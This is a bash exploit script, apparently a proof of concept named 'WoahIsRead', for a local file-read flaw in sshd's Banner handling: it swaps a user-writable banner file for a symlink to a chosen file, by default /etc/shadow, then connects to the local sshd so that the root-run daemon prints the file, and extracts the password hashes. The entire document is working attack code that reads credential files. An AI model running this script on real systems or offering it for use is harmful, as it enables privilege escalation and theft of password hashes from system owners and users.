#!/bin/bash
# By: oxagast
#
# woahisread
# this exploit depends on "Banner" being pointed at a file that
# exists in a dir writeable by the user running the exploit, and
# that the file can be removed/moved by that user.  Basically the
# banner file should be checked for proper permissions, as being
# owned by root and writeable only by root, and sshd fails to do
# this.  This allows you to create a symlink, and read the file
# it points to as the user running the openssh process which is
# normally, root.
useage()
{
  echo "Usage:"
  echo "  $0 -p 22 -s 127.0.0.1 -f /etc/shadow" 1>&2
}

echo "[*] WoahIsRead sshd 9.2 banner symbolic link exploit"
while getopts ":s:p:f:" o; do
  case "${o}" in
    p)
      p=${OPTARG}
      ((p == 1 || p == 65535)) || useage
      ;;
    s)
      s=${OPTARG}
      ;;
    f)
      f=${OPTARG}
      ;;
    ?)
      useage
      ;;
  esac
done
shift $((OPTIND - 1))
if [[ ! $f ]]; then
  f="/etc/shadow"
fi
if [[ ! $p ]]; then
  p="22"
fi
if [[ ! $s ]]; then
  s="127.0.0.1"
fi
BPATH=$(grep -i "^Banner " /etc/ssh/sshd_config | cut -d ' ' -f 2)
VER=$(sshd -V 2>&1 | cut -d ',' -f 1)
OWN=$(stat -c "%U" $f)
echo "[*] SSHD Version:          $VER"
echo "[*] SSHD Banner path is:   $BPATH"
echo "[*] SSHD Banner owner is:  $OWN"
if [[ $BPATH == "none" ]]; then
echo "[x] SSHD Banner must be set to a user owned file"
exit 1
fi
if test -e $BPATH; then
  mv $BPATH $BPATH.bak
  ln -s $f $BPATH
  MOV=1
else
  ln -s $f $BPATH
fi
echo "[*] SSHing to ourselves... $s:$p"
ssh -o BatchMode=true $s -p $p 2>&1 | tee /tmp/sshexp.1 >/dev/null
head -n -1 /tmp/sshexp.1 >out
if [[ $f == "/etc/shadow" ]]; then
  if [[ $(head -n 1 out | grep root) ]]; then
    grep ':\$.\$' out
    echo "[!] Exploit complete, cleaning up..."
    if [[ $MOV -eq 1 ]]; then
      mv $BPATH.bak $BPATH
    fi
    exit 0
  else
    echo "[x] Sorry, exploit failed."
    exit 1
  fi
else
  cat out
  exit 0
fi